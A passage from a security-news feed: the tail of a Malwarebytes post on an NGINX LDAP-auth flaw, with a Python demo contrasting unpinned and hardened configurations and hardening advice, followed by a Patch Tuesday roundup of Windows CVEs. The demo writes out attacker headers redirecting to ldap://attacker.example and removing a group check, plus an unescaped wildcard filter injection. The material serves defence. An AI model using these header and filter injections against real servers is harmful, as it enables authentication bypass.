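    """Attacker-controlled headers against an unpinned and a hardened block."""
    cli_defaults = {  # what the daemon was started with (constructed values)
        "url": "ldap://ldap.corp.example",
        "basedn": "ou=people,dc=corp,dc=example",
        "binddn": "cn=nginx,ou=svc,dc=corp,dc=example",
        "template": "(&(cn=%(username)s)(memberOf=cn=staff,ou=groups,dc=corp,dc=example))",
    }
    attacker = {  # headers an attacker adds to their own request
        "X-Ldap-URL": "ldap://attacker.example",
        "X-Ldap-Template": "(cn=%(username)s)",  # drops the memberOf check
    }
    unpinned = resolve_params(forward_headers(attacker, {}), cli_defaults)
    hardened = resolve_params(
        forward_headers(attacker, parse_set_headers(HARDENED_AUTH_PROXY)),
        cli_defaults,
    )
    return {"unpinned": unpinned, "hardened": hardened}


if __name__ == "__main__":
    for name, params in demo().items():
        print(name, params)
    print(build_filter("(cn=%(username)s)", "*", sanitize=False))  # wildcard matches every entry
    print(build_filter("(cn=%(username)s)", "*"))                  # escaped: (cn=\2a)
```

Two caveats. The empty-value trick only protects parameters the daemon already has from its command line; an empty X-Ldap-Template removes the header but leaves the daemon with its built-in `(cn=%(username)s)` default, which has no group check, so either pin a non-empty template in the location block or pass it on the command line. And the escaping shown is the RFC 4515 approach rather than the character stripping NGINX recommends: stripping is simpler, escaping keeps legitimate characters in usernames while still neutralising them as filter syntax.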

NGINX states that the backend daemon in the LDAP reference implementation will be updated to sanitize this type of input in due course.

And we have rounded up some additional advice.

LDAP is also used by many IoT devices, which outnumber conventional IT devices by a wide margin. Organizations running LDAP should therefore encrypt LDAP traffic with TLS (LDAPS or StartTLS) rather than sending credentials in the clear, keep device firmware up to date, and apply proper password management.

Make sure that you sanitize any input before it gets passed to the daemon.

Stay safe, everyone!

The post NGINX zero-day vulnerability: Check if you’re affected appeared first on Malwarebytes Labs.

April’s Patch Tuesday update includes fixes for two zero-day vulnerabilities

It’s that time of the month again. Time to check what needs to be updated and prioritize where necessary. The Microsoft updates include at least two zero-day vulnerabilities that deserve your attention.

Microsoft

Microsoft has released security updates and non-security updates for client and server versions of its Windows operating system and other company products, including Microsoft Office and Edge.

For those that have extended support for Windows 7, there are four critical remote code execution (RCE) vulnerabilities to worry about:

  • CVE-2022-24500 CVSS 8.8 out of 10, a Windows SMB Remote Code Execution vulnerability
  • CVE-2022-24541 CVSS 8.8, a Windows Server Service Remote Code Execution vulnerability
  • CVE-2022-26809 CVSS 9.8, a Remote Procedure Call Runtime Remote Code Execution vulnerability
  • CVE-2022-26919 CVSS 8.1, a Windows LDAP Remote Code Execution vulnerability

CVE-2022-26809 has a CVSS of 9.8 for good reason. It affects almost every Windows OS and Microsoft lists it as "Exploitation More Likely". To exploit this vulnerability, an attacker would need to send a specially crafted RPC call to an RPC host. This could result in remote code execution on the server side with the same permissions as the RPC service. TCP port 445 is used to initiate a connection with the affected component, and some quick Shodan scans showed that millions of systems have that port exposed to the internet.

Microsoft classifies a vulnerability as a zero-day if it is publicly disclosed or actively exploited with no official fix available. The zero-day vulnerabilities fixed in this update cycle are:

  • CVE-2022-26904 CVSS 7.0, a Windows User Profile Service Elevation of Privilege (EoP) vulnerability. This one is marked with a high attack complexity, because successful exploitation requires an attacker to win a race condition. But the vulnerability is public knowledge and there is an existing Metasploit module for it. Metasploit is an open-source penetration testing framework used by security engineers both as a testing system and as a development platform for creating security tools and exploits.
  • CVE-2022-24521 CVSS 7.8, a Windows Common Log File System Driver Elevation of Privilege vulnerability. This vulnerability has been exploited in the wild. Microsoft says that attack complexity is low. The vulnerability was reported to Microsoft by the National Security Agency (NSA) and CrowdStrike.

Other notable CVEs:

  • CVE-2022-24491 CVSS 9.8, a Windows Network File System Remote Code Execution vulnerability. This vulnerability is only exploitable for systems that have the NFS role enabled. An attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution.
  • CVE-2022-24997 CVSS 9.8, another Windows Network File System Remote Code Execution vulnerability. This vulnerability is only exploitable for systems that have the NFS role enabled. An attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution.

On systems with the NFS role enabled, a remote attacker could execute code with high privileges and without user interaction. This worries experts because these may turn out to be wormable bugs that spread between NFS servers. As a temporary workaround, the NFS role can be removed on servers that do not need it; Microsoft's documentation on installing or uninstalling roles and role services describes how.

A vulnerability is considered wormable if an attack can be launched that requires no human interaction to spread. The impact can be considerable if the number of vulnerable machines is high enough. In these cases, restricting the affected service's ports at the perimeter and between network segments (NFS on TCP/UDP 2049, SMB and RPC over TCP 445) helps mitigate the risk until patches are applied; note that a web application firewall only inspects HTTP traffic and offers no protection against these protocols.

In related news, Microsoft announced the release of Windows Autopatch, which is set for July 2022. This will hopefully lessen some of the burdens that come with patch management.

Edge and Chrome

The Microsoft updates included 26 Microsoft Edge vulnerabilities and Google released a stable channel update for Windows, Mac, and Linux that includes 11 security fixes. Eight out of those 11 were rated with a High severity, none were marked as Critical.

Other updates

While you’re at it, we also saw updates from vendors like:

Stay safe, everyone!

The post April’s Patch Tuesday update includes fixes for two zero-day vulnerabilities appeared first on Malwarebytes Labs.